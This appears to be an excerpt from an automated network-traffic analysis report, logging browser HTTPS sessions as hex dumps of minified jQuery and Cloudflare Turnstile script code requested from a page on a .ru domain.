                                                                              2025-01-20 13:17:26 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                              Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                              2025-01-20 13:17:26 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                              Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                                              2025-01-20 13:17:26 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                                              Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                                              2025-01-20 13:17:26 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                                              Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                                              2025-01-20 13:17:26 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                                              Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                                              2025-01-20 13:17:26 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                                              Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                                              2025-01-20 13:17:26 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                                              Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                                              2025-01-20 13:17:26 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                                              Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              9192.168.2.649809104.18.95.414436468C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-20 13:17:27 UTC647OUTGET /turnstile/v0/g/672eb098a9f3/api.js HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: cross-site
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: script
                                                                              Referer: https://hbv.julfolusi.ru/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2025-01-20 13:17:27 UTC471INHTTP/1.1 200 OK
                                                                              Date: Mon, 20 Jan 2025 13:17:27 GMT
                                                                              Content-Type: application/javascript; charset=UTF-8
                                                                              Content-Length: 48121
                                                                              Connection: close
                                                                              accept-ranges: bytes
                                                                              last-modified: Wed, 15 Jan 2025 14:50:44 GMT
                                                                              cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                              access-control-allow-origin: *
                                                                              cross-origin-resource-policy: cross-origin
                                                                              Server: cloudflare
                                                                              CF-RAY: 904f58472bf741af-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2025-01-20 13:17:27 UTC1369INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 2c 74 2c 61 2c 6f 2c 63 2c 6c 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 6c 5d 28 67 29 2c 73 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 61 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 74 28 73 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 73 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 6a 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2c 61 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 74 2c 61 29 3b 66 75 6e 63 74
                                                                              Data Ascii: "use strict";(function(){function Bt(e,t,a,o,c,l,g){try{var h=e[l](g),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function jt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);funct
                                                                              2025-01-20 13:17:27 UTC1369INData Raw: 74 28 65 29 7b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 65 29 29 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 7a 74 28 65 2c 74 29 7b 76 61 72 20 61 3d 65 3d 3d 6e 75 6c 6c 3f 6e 75 6c 6c 3a 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 7c 7c 65 5b 22 40 40 69 74 65 72 61 74 6f 72 22 5d 3b 69 66 28 61 21 3d 6e 75 6c 6c 29 7b 76 61 72 20 6f 3d 5b 5d 2c 63 3d 21 30 2c 6c 3d 21 31 2c 67 2c 68 3b 74 72 79 7b 66 6f 72 28 61 3d 61 2e 63 61 6c 6c 28 65 29 3b 21 28 63 3d 28 67 3d 61 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 29 26 26 28 6f 2e 70 75 73 68 28 67 2e 76 61 6c 75 65 29 2c 21 28 74 26 26 6f 2e 6c 65 6e 67 74 68 3d 3d 3d 74 29 29 3b 63 3d 21 30 29
                                                                              Data Ascii: t(e){if(Array.isArray(e))return e}function zt(e,t){var a=e==null?null:typeof Symbol!="undefined"&&e[Symbol.iterator]||e["@@iterator"];if(a!=null){var o=[],c=!0,l=!1,g,h;try{for(a=a.call(e);!(c=(g=a.next()).done)&&(o.push(g.value),!(t&&o.length===t));c=!0)
                                                                              2025-01-20 13:17:27 UTC1369INData Raw: 5d 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 73 28 70 29 7b 69 66 28 6f 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 47 65 6e 65 72 61 74 6f 72 20 69 73 20 61 6c 72 65 61 64 79 20 65 78 65 63 75 74 69 6e 67 2e 22 29 3b 66 6f 72 28 3b 67 26 26 28 67 3d 30 2c 70 5b 30 5d 26 26 28 61 3d 30 29 29 2c 61 3b 29 74 72 79 7b 69 66 28 6f 3d 31 2c 63 26 26 28 6c 3d 70 5b 30 5d 26 32 3f 63 2e 72 65 74 75 72 6e 3a 70 5b 30 5d 3f 63 2e 74 68 72 6f 77 7c 7c 28 28 6c 3d 63 2e 72 65 74 75 72 6e 29 26 26 6c 2e 63 61 6c 6c 28 63 29 2c 30 29 3a 63 2e 6e 65 78 74 29 26 26 21 28 6c 3d 6c 2e 63 61 6c 6c 28 63 2c 70 5b 31 5d 29 29 2e 64 6f 6e 65 29 72 65 74 75 72 6e 20 6c 3b 73 77 69 74 63 68 28 63 3d 30 2c 6c 26 26 28 70 3d 5b 70 5b 30 5d 26 32 2c 6c 2e 76 61 6c
                                                                              Data Ascii: ])}}function s(p){if(o)throw new TypeError("Generator is already executing.");for(;g&&(g=0,p[0]&&(a=0)),a;)try{if(o=1,c&&(l=p[0]&2?c.return:p[0]?c.throw||((l=c.return)&&l.call(c),0):c.next)&&!(l=l.call(c,p[1])).done)return l;switch(c=0,l&&(p=[p[0]&2,l.val
                                                                              2025-01-20 13:17:27 UTC1369INData Raw: 29 29 3b 76 61 72 20 48 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 2c 65 2e 4c 49 47 48 54 3d 22 6c 69 67 68 74 22 2c 65 2e 44 41 52 4b 3d 22 64 61 72 6b 22 7d 29 28 48 65 7c 7c 28 48 65 3d 7b 7d 29 29 3b 76 61 72 20 4f 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 56 45 52 49 46 59 49 4e 47 3d 22 76 65 72 69 66 79 69 6e 67 22 2c 65 2e 56 45 52 49 46 59 49 4e 47 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 3d 22 76 65 72 69 66 79 69 6e 67 2d 68 61 76 69 6e 67 2d 74 72 6f 75 62 6c 65 73 22 2c 65 2e 56 45 52 49 46 59 49 4e 47 5f 4f 56 45 52 52 55 4e 3d 22 76 65 72 69 66 79 69 6e 67 2d 6f 76 65 72 72 75 6e 22 2c 65 2e 46 41 49 4c 55 52 45 5f 57 4f 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 3d 22 66 61 69
                                                                              Data Ascii: ));var He;(function(e){e.AUTO="auto",e.LIGHT="light",e.DARK="dark"})(He||(He={}));var Oe;(function(e){e.VERIFYING="verifying",e.VERIFYING_HAVING_TROUBLES="verifying-having-troubles",e.VERIFYING_OVERRUN="verifying-overrun",e.FAILURE_WO_HAVING_TROUBLES="fai
                                                                              2025-01-20 13:17:27 UTC1369INData Raw: 53 74 61 6c 65 45 78 65 63 75 74 65 3d 22 73 74 61 6c 65 5f 65 78 65 63 75 74 65 22 2c 65 2e 41 75 74 6f 45 78 70 69 72 65 3d 22 61 75 74 6f 5f 65 78 70 69 72 65 22 2c 65 2e 41 75 74 6f 54 69 6d 65 6f 75 74 3d 22 61 75 74 6f 5f 74 69 6d 65 6f 75 74 22 2c 65 2e 4d 61 6e 75 61 6c 52 65 66 72 65 73 68 3d 22 6d 61 6e 75 61 6c 5f 72 65 66 72 65 73 68 22 2c 65 2e 41 70 69 3d 22 61 70 69 22 2c 65 2e 43 68 65 63 6b 44 65 6c 61 79 73 3d 22 63 68 65 63 6b 5f 64 65 6c 61 79 73 22 2c 65 2e 54 69 6d 65 43 68 65 63 6b 43 61 63 68 65 64 57 61 72 6e 69 6e 67 41 75 78 3d 22 74 69 6d 65 5f 63 68 65 63 6b 5f 63 61 63 68 65 64 5f 77 61 72 6e 69 6e 67 5f 61 75 78 22 2c 65 2e 4a 73 43 6f 6f 6b 69 65 73 4d 69 73 73 69 6e 67 41 75 78 3d 22 6a 73 5f 63 6f 6f 6b 69 65 73 5f 6d 69
                                                                              Data Ascii: StaleExecute="stale_execute",e.AutoExpire="auto_expire",e.AutoTimeout="auto_timeout",e.ManualRefresh="manual_refresh",e.Api="api",e.CheckDelays="check_delays",e.TimeCheckCachedWarningAux="time_check_cached_warning_aux",e.JsCookiesMissingAux="js_cookies_mi
                                                                              2025-01-20 13:17:27 UTC1369INData Raw: 7b 76 61 72 20 74 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 74 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 74 2e 73 65 74 28 22 63 6c 65 61 72 61 6e 63 65 5f
                                                                              Data Ascii: {var t=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&t.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clearance_level!=="default"&&t.set("clearance_
                                                                              2025-01-20 13:17:27 UTC1369INData Raw: 3d 4f 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 4f 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 6c 2c 67 3d 4d 28 4c 72 2c 28 6c 3d 28 74 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 74 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 6c 21 3d 3d 76 6f 69 64 20 30 3f 6c 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 68 2c 73 3d 4d 28 4d 72 2c 28 68 3d 28 61 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 61 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 61 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c
                                                                              Data Ascii: =Oe.FAILURE_FEEDBACK||e.state===Oe.FAILURE_HAVING_TROUBLES,l,g=M(Lr,(l=(t=e.displayLanguage)===null||t===void 0?void 0:t.toLowerCase())!==null&&l!==void 0?l:"nonexistent"),h,s=M(Mr,(h=(a=e.displayLanguage)===null||a===void 0?void 0:a.toLowerCase())!==null
                                                                              2025-01-20 13:17:27 UTC1369INData Raw: 2c 61 29 7b 72 65 74 75 72 6e 20 7a 65 28 29 3f 43 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 43 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 6c 2c 67 29 7b 76 61 72 20 68 3d 5b 6e 75 6c 6c 5d 3b 68 2e 70 75 73 68 2e 61 70 70 6c 79 28 68 2c 6c 29 3b 76 61 72 20 73 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 68 29 2c 70 3d 6e 65 77 20 73 3b 72 65 74 75 72 6e 20 67 26 26 74 65 28 70 2c 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 70 7d 2c 43 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 6c 65 28 65 29 7b 72 65 74 75 72 6e 20 6c 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3a 66 75 6e 63
                                                                              Data Ascii: ,a){return ze()?Ce=Reflect.construct:Ce=function(c,l,g){var h=[null];h.push.apply(h,l);var s=Function.bind.apply(c,h),p=new s;return g&&te(p,g.prototype),p},Ce.apply(null,arguments)}function le(e){return le=Object.setPrototypeOf?Object.getPrototypeOf:func
                                                                              2025-01-20 13:17:27 UTC1369INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 78 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 58 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 6a 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 6a 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 24 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 6a 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 49 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 74 3d 64 6f 63 75 6d 65 6e 74 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 3b
                                                                              Data Ascii: }function x(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function Xe(e){return e.startsWith(je)?e.substring(je.length):null}function $(e){return"".concat(je).concat(e)}function It(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,t=document.currentScript;
                                                                              2025-01-20 13:17:27 UTC1369INData Raw: 74 65 72 22 2c 73 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 73 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 73 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b 76 61 72 20 5f 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74
                                                                              Data Ascii: ter",s.style.overflowX="hidden",s.style.overflowY="auto",s.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";var _=document.creat


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
